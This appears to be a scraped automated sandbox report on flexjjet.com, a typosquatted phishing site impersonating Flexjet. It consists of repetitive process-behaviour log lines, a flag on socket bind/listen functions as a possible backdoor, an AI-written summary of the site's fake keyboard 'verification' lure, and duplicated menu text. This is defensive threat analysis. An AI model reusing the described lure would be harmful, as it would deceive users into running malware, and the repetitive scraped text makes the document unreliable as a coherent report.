Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Queries volume information: C:\Temp\PyEnv\python311.zip VolumeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 20_2_00007FFF7F6904E5 CreateNamedPipeW,

20_2_00007FFF7F6904E5

Source: C:\Temp\PyEnv\python.exe

Code function: 24_0_00007FF70C491680 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

24_0_00007FF70C491680

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068A45E4 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,		26_2_00007FF8068A45E4
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068A55F8 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,		26_2_00007FF8068A55F8

AI Summary

Source: https://flexjjet.com/?type=3

# Threat Overview: Typosquatting Phishing Attempt Impersonating Flexjet

## Key Findings

### Deceptive Domain Strategy
- The malicious website uses the domain `flexjjet.com`, which is a deliberate misspelling of the legitimate `flexjet.com` domain
- An extra "j" is strategically inserted to create visual similarity and potentially trick users into believing it's the authentic Flexjet website

### Sophisticated User Deception Techniques
- The site presents a "Region Selector" page that mimics a legitimate business website
- Includes a complex "verification" pop-up designed to appear as a security measure
- Verification steps require specific keyboard actions, likely to bypass automated detection and create an illusion of legitimacy

### Technical Indicators
- High phishing risk score of 8/10
- URL contains intentional typosquatting characteristics
- Uses HTTPS to create a false sense of security
- Closely mimics the visual design of the authentic Flexjet website

## Conclusion

This attack leverages subtle domain manipulation and sophisticated social engineering techniques to trick users into believing they are on the official Flexjet website. The primary goal appears to be capturing user interactions through a deceptive verification process, potentially setting up credential theft or malware delivery.

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET

Windows Analysis Report
http://flexjjet.com

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

AI Summary

Source: https://flexjjet.com/?type=3

Screenshots

Behavior Graph

Windows Analysis Report http://flexjjet.com

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

AI Summary

Source: https://flexjjet.com/?type=3

Screenshots

Behavior Graph

Windows Analysis Report
http://flexjjet.com